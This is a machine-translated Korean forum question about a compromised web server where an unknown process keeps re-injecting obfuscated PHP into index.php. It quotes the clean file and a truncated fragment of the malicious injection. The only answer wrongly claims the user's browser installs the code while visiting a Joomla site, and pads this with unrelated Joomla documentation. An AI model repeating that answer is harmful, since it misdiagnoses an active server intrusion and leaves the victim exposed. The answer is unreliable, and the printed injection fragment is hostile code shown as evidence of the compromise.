프로세스가 내 시스템을 제어하고 내 웹 애플리케이션의 루트 폴더에 있는 여러 파일을 편집한 것 같습니다 index.php
.
파일을 복원하려고 했지만 초대받지 않은 프로세스가 권한을 "읽기 전용"으로 변경했습니다.
나는 다음을 시도했습니다 :
소유자/권한을 변경하고 파일을 편집해 보세요.
결과: 소유자 및 권한이 자동으로 다시 변경됩니다.
소유자/권한을 변경한 후 파일 삭제를 시도하십시오.
결과: 파일이 삭제된 것처럼 보이지만 1밀리초 후에 동일한 편집 내용으로 다시 생성됩니다.
또한 auditctl
파일 모니터링을 시도했지만 파일에 대한 내 명령만 기록하고 다른 프로세스의 명령은 기록하지 않았기 때문에 성공하지 못했습니다.
그래서 제 질문은 이 파일을 어떻게 제어하고 이 문제를 일으키는 프로세스를 감지하여 종료할 수 있느냐는 것입니다. 내가 시도할 수 있는 것에 대한 제안이 있나요?
고쳐 쓰다:
"chmod"를 사용한 다음 "ls -l"을 확인하면 변경 사항이 적용된 것을 볼 수 있습니다. 그러나 파일을 편집하거나 삭제하려고 시도한 후 "ls -l"을 다시 확인하면 chmod를 사용하여 변경한 내용이 되돌려집니다.
"rm"을 연속으로 여러 번 스팸하려고 시도하고 충분히 빠르면 결국 "해당 파일이나 디렉터리가 없습니다"라는 메시지를 받게 되므로 파일을 삭제하는 것이 (몇 밀리초 안에) 가능하다는 것을 알고 있습니다.
프로세스가 웹 사이트 폴더의 파일만 편집하는지는 모르겠지만 그것이 제가 알아차린 것입니다.
내 신청 때문에 내 호스트가 경쟁 서비스를 제공하는 것 같지만 확실하지 않습니다. 그래도 루트 액세스 권한이 있으므로 파일/프로세스를 제어할 수 있어야 하지 않나요?
원본 파일:
<?php include 'pages/home/home.php'; ?>
편집된 파일:
<?php /*-wxD=-*/error_reporting(0); $TlQa /*-DZ@mPZJ(C>cyqBG[-*/=/*-;z4tQE}FbYQPgp3Df_f-*/ "ra"./*-e6wxBt3m.2MGhvLXW-*/>include 'pages/home/home.php';
답변1
귀하의 브라우저는 귀하가 방문하는 Joomla 웹사이트의 일부로 이를 설치합니다.
문서 Joomla!
(기본 페이지 docs.joomla.org/Main_Page
에는 검색 옵션이 있음 - try index.php
)에는 다음과 같이 나와 있습니다.
index.php 파일은 웹사이트의 뼈대입니다. Joomla!의 각 페이지는 데이터베이스에서 삽입된 콘텐츠가 풍부한 index.php를 제공합니다.
왜냐하면 줌라! PHP로 작성되었으며, index.php가 자동으로 제공되는 파일입니다. 상황을 더욱 복잡하게 만드는 것은 사용자가 Joomla 웹사이트로 이동하면 루트 디렉터리의 index.php가 현재 템플릿의 index.php로 리디렉션된다는 점입니다.